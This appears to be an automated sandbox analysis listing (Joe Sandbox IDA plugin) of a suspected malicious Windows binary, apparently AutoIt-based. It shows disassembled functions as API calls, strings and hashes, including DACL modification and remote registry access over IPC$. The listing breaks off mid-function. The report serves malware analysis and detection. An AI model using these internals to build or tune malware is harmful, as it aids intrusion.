GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00DABD04,?,?,00000000,?), ref: 00DAE57B
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00DABD04,?,?,00000000,?), ref: 00DAE586
CloseHandle.KERNEL32(00000000,?,?,?,?,00DABD04,?,?,00000000,?), ref: 00DAE593
GlobalLock.KERNEL32(00000000), ref: 00DAE59C
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00DABD04,?,?,00000000,?), ref: 00DAE5AB
GlobalUnlock.KERNEL32(00000000), ref: 00DAE5B4
CloseHandle.KERNEL32(00000000,?,?,?,?,00DABD04,?,?,00000000,?), ref: 00DAE5BB
CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00DAE5CC
OleLoadPicture.OLEAUT32(?,00000000,00000000,00DCD9BC,?), ref: 00DAE5E5
GlobalFree.KERNEL32(00000000), ref: 00DAE5F5
GetObjectW.GDI32(00000000,00000018,?), ref: 00DAE619
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00DAE644
DeleteObject.GDI32(00000000), ref: 00DAE66C
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00DAE682

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: d84c8f5085fdeee7044d175c207743bca777f13cc7edcdf7e907b88583467295
Instruction ID: 856eae2bd3d1478060eb38a2a02e9ab6782fd177fc9a7d1ce7d4e2a5571de9b0
Opcode Fuzzy Hash: d84c8f5085fdeee7044d175c207743bca777f13cc7edcdf7e907b88583467295
Instruction Fuzzy Hash: 3A415A75A00306BFDB119F65DC88EAABBBAEF8A715F148468F906D7260D7309D01DB70

Function 00D90B20 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 00D90C93
_wcscat.LIBCMT ref: 00D90CAB
_wcscat.LIBCMT ref: 00D90CBD
GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00D90CD2
SetCurrentDirectoryW.KERNEL32(?), ref: 00D90CE6
GetFileAttributesW.KERNEL32(?), ref: 00D90CFE
SetFileAttributesW.KERNEL32(?,00000000), ref: 00D90D18
SetCurrentDirectoryW.KERNEL32(?), ref: 00D90D2A

Strings

*.*, xrefs: 00D90D69

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 5cc242b0ca7c9c3cdad8ffcfb2479da8f5040241a40d5f60887acd45123fe8a1
Instruction ID: bba93fe1db4df61dc6e1a45e1aa4e67a326318a603f02f185779220ef81781ef
Opcode Fuzzy Hash: 5cc242b0ca7c9c3cdad8ffcfb2479da8f5040241a40d5f60887acd45123fe8a1
Instruction Fuzzy Hash: 668193715043059FCF64DF64D8449AABBE9EF89314F18892AF889C7251E734ED84CBB2

Function 00D7B593 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D7B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00D7B903
Part of subcall function 00D7B8E7: GetLastError.KERNEL32(?,00D7B3CB,?,?,?), ref: 00D7B90D
Part of subcall function 00D7B8E7: GetProcessHeap.KERNEL32(00000008,?,?,00D7B3CB,?,?,?), ref: 00D7B91C
Part of subcall function 00D7B8E7: RtlAllocateHeap.NTDLL(00000000,?,00D7B3CB), ref: 00D7B923
Part of subcall function 00D7B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00D7B93A

Part of subcall function 00D7B982: GetProcessHeap.KERNEL32(00000008,00D7B3E1,00000000,00000000,?,00D7B3E1,?), ref: 00D7B98E
Part of subcall function 00D7B982: RtlAllocateHeap.NTDLL(00000000,?,00D7B3E1), ref: 00D7B995
Part of subcall function 00D7B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00D7B3E1,?), ref: 00D7B9A6

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00D7B5F7
_memset.LIBCMT ref: 00D7B60C
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00D7B62B
GetLengthSid.ADVAPI32(?), ref: 00D7B63C
GetAce.ADVAPI32(?,00000000,?), ref: 00D7B679
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00D7B695
GetLengthSid.ADVAPI32(?), ref: 00D7B6B2
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00D7B6C1
RtlAllocateHeap.NTDLL(00000000), ref: 00D7B6C8
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00D7B6E9
CopySid.ADVAPI32(00000000), ref: 00D7B6F0
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00D7B721
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00D7B747
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00D7B75B

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 2347767575-0
Opcode ID: afd71ac68730d2f4d4b280366eeca2507b69b08dbc8ab6f17426f9fc92bf83a4
Instruction ID: 2b06b4f166836ad2142851aab5ca5df1395c46ae5187bd0eb2250f068a878e45
Opcode Fuzzy Hash: afd71ac68730d2f4d4b280366eeca2507b69b08dbc8ab6f17426f9fc92bf83a4
Instruction Fuzzy Hash: 85513C7590020AAFDF049FA4DC45EEEBB79FF44354F04816AE919EB290EB319A05DB70

Function 00D9A268 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00D9A2DD
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00D9A2E9
CreateCompatibleDC.GDI32(?), ref: 00D9A2F5
SelectObject.GDI32(00000000,?), ref: 00D9A302
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00D9A356
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00D9A392
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00D9A3B6
SelectObject.GDI32(00000006,?), ref: 00D9A3BE
DeleteObject.GDI32(?), ref: 00D9A3C7
DeleteDC.GDI32(00000006), ref: 00D9A3CE
ReleaseDC.USER32(00000000,?), ref: 00D9A3D9

Strings

(, xrefs: 00D9A37E

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 44c00734bbd481a58d1548a708b6886cbca2234aee800941d6ec0d087df68c39
Instruction ID: 4ffcd3f75db275388b1a078d9a8de7263365c80a09e3db3f536c5836a208a3e0
Opcode Fuzzy Hash: 44c00734bbd481a58d1548a708b6886cbca2234aee800941d6ec0d087df68c39
Instruction Fuzzy Hash: F6513B7690030AAFDB15CFA8CC84EAEBBB9EF48310F14841DF99597350D731A941CBA0

Function 00D832B0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00DB3C64,00000010,00000000,Bad directive syntax error,00DDDBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 00D832D1
LoadStringW.USER32(00000000,?,00DB3C64,00000010), ref: 00D832D8

Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F

_wprintf.LIBCMT ref: 00D83309
__swprintf.LIBCMT ref: 00D8332B
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00D83395

Strings

%s (%d) : ==> %s.: %s %s, xrefs: 00D83304
Line %d:, xrefs: 00D83325
Error: , xrefs: 00D83363
", xrefs: 00D83338, 00D83322, 00D832FE
Line %d (File "%s"):, xrefs: 00D8333B
., xrefs: 00D8337B

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:$"
API String ID: 1506413516-3476811254
Opcode ID: 6c786503fd433fc85ef4eee06275c4a0da85a92b897c2bc291cfd504e9925c1a
Instruction ID: f2764685592ec7144af4cf302efe1b2bccdf27eac1360cdf2aaa17ee46f99a07
Opcode Fuzzy Hash: 6c786503fd433fc85ef4eee06275c4a0da85a92b897c2bc291cfd504e9925c1a
Instruction Fuzzy Hash: 6F21273185021EBBCF11EF90CC4AEEE7775FF28700F004456B619A10A2EA76AB58DB70

Function 00D8D520 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 144COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF), ref: 00D8D567

Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F

LoadStringW.USER32(?,?,00000FFF,?), ref: 00D8D589
__swprintf.LIBCMT ref: 00D8D5DC
_wprintf.LIBCMT ref: 00D8D68D
_wprintf.LIBCMT ref: 00D8D6AB

Strings

"%s" (%d) : ==> %s:, xrefs: 00D8D6A6
Error: , xrefs: 00D8D657
^ ERROR, xrefs: 00D8D631
"%s" (%d) : ==> %s:%s%s, xrefs: 00D8D688
Line %d (File "%s"):, xrefs: 00D8D5D6

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: LoadString_wprintf$__swprintf_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2116804098-2391861430
Opcode ID: d6972fd0089b82167a8417e92eb8fc526abebdaf26a7182e439333c0ef168307
Instruction ID: 3acc31ef8c5c51ef24c45a0bcb25cd595adcc68359e60db1a7e2a184216a2dbb
Opcode Fuzzy Hash: d6972fd0089b82167a8417e92eb8fc526abebdaf26a7182e439333c0ef168307
Instruction Fuzzy Hash: CF512C72900109ABDB15FBA4DD82EEEB779EF14700F104166F505B21A1EA726F58DBB0

Function 00D8D338 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 140COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00D8D37F

Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00D8D3A0
__swprintf.LIBCMT ref: 00D8D3F3
_wprintf.LIBCMT ref: 00D8D499
_wprintf.LIBCMT ref: 00D8D4B7

Strings

"%s" (%d) : ==> %s:, xrefs: 00D8D4B2
Error: , xrefs: 00D8D463
^ ERROR , xrefs: 00D8D432
"%s" (%d) : ==> %s:%s%s, xrefs: 00D8D494
Line %d (File "%s"):, xrefs: 00D8D3ED

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: LoadString_wprintf$__swprintf_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2116804098-3420473620
Opcode ID: 9f58a74bdc42ceab1e5b0d83190ef52bd6f3dd41456c1ff4d3fb4c85f98b3a8b
Instruction ID: 83ce49e2abf435d6aa1361561107ac7745ab078c3ced5349d95a1fec822ec99b
Opcode Fuzzy Hash: 9f58a74bdc42ceab1e5b0d83190ef52bd6f3dd41456c1ff4d3fb4c85f98b3a8b
Instruction Fuzzy Hash: 5C517072900209ABCB15FBA4DD82EEEB779EF14700F108466B105B21A1EB756F58DB70

Function 00D7AEE5 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00D47E53: _memmove.LIBCMT ref: 00D47EB9

_memset.LIBCMT ref: 00D7AF74
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00D7AFA9
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00D7AFC5
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00D7AFE1
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00D7B00B
CLSIDFromString.COMBASE(?,?), ref: 00D7B033
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00D7B03E
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00D7B043

Strings

\IPC$, xrefs: 00D7AF8B
\CLSID, xrefs: 00D7AF2B
SOFTWARE\Classes\, xrefs: 00D7AF15

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: 3e48fe77d730e77f9249e694b406139c9f87731634ced4a6282e6389869e09cd
Instruction ID: 93e706147bc34caf5e23d091619dc24d37b095c9df7e3eecb19fdccffd75eaf3
Opcode Fuzzy Hash: 3e48fe77d730e77f9249e694b406139c9f87731634ced4a6282e6389869e09cd
Instruction Fuzzy Hash: D341F77681022DABCB11EBA4DC85DEEB779FF14710F04816AF905A21A1EB759E04CFB0

Function 00DA3AF7 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DA2AA6,?,?), ref: 00DA3B0E

Strings

HKEY_CURRENT_USER, xrefs: 00DA3BD3
HKEY_CLASSES_ROOT, xrefs: 00DA3B87
HKEY_CURRENT_CONFIG, xrefs: 00DA3BB1
HKLM, xrefs: 00DA3B72
HKU, xrefs: 00DA3C06
HKCC, xrefs: 00DA3BC2
HKEY_LOCAL_MACHINE, xrefs: 00DA3B5D
HKCR, xrefs: 00DA3B9C
HKCU, xrefs: 00DA3BE4
HKEY_USERS, xrefs: 00DA3BF5

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 18fde6cfbb7f8ff90aa88436733d6fbb6300a101a05020195924456909ef259e
Instruction ID: ffd7393394c5d456b980ee9f53921043dacec5b798c1fb2f84adb2f6db05ccab
Opcode Fuzzy Hash: 18fde6cfbb7f8ff90aa88436733d6fbb6300a101a05020195924456909ef259e
Instruction Fuzzy Hash: 91414B7414034A9BDF08EF14DC51AEA3762EF26360F598824BC915B296DB309A5ECB71

Function 00D883D6 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

Part of subcall function 00D47E53: _memmove.LIBCMT ref: 00D47EB9

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00D8843F
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00D88455
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D88466
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00D88478
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00D88489

Strings

alias PlayMe, xrefs: 00D88418
close PlayMe, xrefs: 00D88450, 00D8847D
open , xrefs: 00D883EE
play PlayMe wait, xrefs: 00D88473
play PlayMe, xrefs: 00D88484
status PlayMe mode, xrefs: 00D8843A

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: eb4ef566bfa2a8367b797c05925b561df215d1f1577aa824dfbe5789be578f50
Instruction ID: e8a4673be0a6b8680e58569622a77910e2332f853469df8575864f07e88f4f5a
Opcode Fuzzy Hash: eb4ef566bfa2a8367b797c05925b561df215d1f1577aa824dfbe5789be578f50
Instruction Fuzzy Hash: FA11A361A4025E7ED714B7A6CC4ADFF7B7CEB91B40F854829B911A20D1DEB05E48CAB0

Function 00D88097 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00D8809C

Part of subcall function 00D5E3A5: timeGetTime.WINMM(?,75A4B400,00DB6163), ref: 00D5E3A9

Sleep.KERNEL32(0000000A), ref: 00D880C8
EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 00D880EC
FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00D8810E
SetActiveWindow.USER32 ref: 00D8812D
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00D8813B
SendMessageW.USER32(00000010,00000000,00000000), ref: 00D8815A
Sleep.KERNEL32(000000FA), ref: 00D88165
IsWindow.USER32 ref: 00D88171
EndDialog.USER32(00000000), ref: 00D88182

Strings

BUTTON, xrefs: 00D88100

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 5f79791a3385d4b75f7eabf9c8ad4d76cbb2b3ba88fd7930ce3a82a7b09aacc6
Instruction ID: 4b83883b0ac8bde0a0834f5e838b5b5ef208e6b3d67bd4de267e10ca32871038
Opcode Fuzzy Hash: 5f79791a3385d4b75f7eabf9c8ad4d76cbb2b3ba88fd7930ce3a82a7b09aacc6
Instruction Fuzzy Hash: 16216270240306BFE7226B72EC89E263B6FF715389B480125F521D62A1CF738D499B31

Function 00D8C890 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00D8C6A0: __time64.LIBCMT ref: 00D8C6AA

Part of subcall function 00D441A7: _fseek.LIBCMT ref: 00D441BF

__wsplitpath.LIBCMT ref: 00D8C96F

Part of subcall function 00D6297D: __wsplitpath_helper.LIBCMT ref: 00D629BD

_wcscpy.LIBCMT ref: 00D8C982
_wcscat.LIBCMT ref: 00D8C995
__wsplitpath.LIBCMT ref: 00D8C9BA
_wcscat.LIBCMT ref: 00D8C9D0
_wcscat.LIBCMT ref: 00D8C9E3

Part of subcall function 00D8C6E4: _memmove.LIBCMT ref: 00D8C71D
Part of subcall function 00D8C6E4: _memmove.LIBCMT ref: 00D8C72C

_wcscmp.LIBCMT ref: 00D8C92A

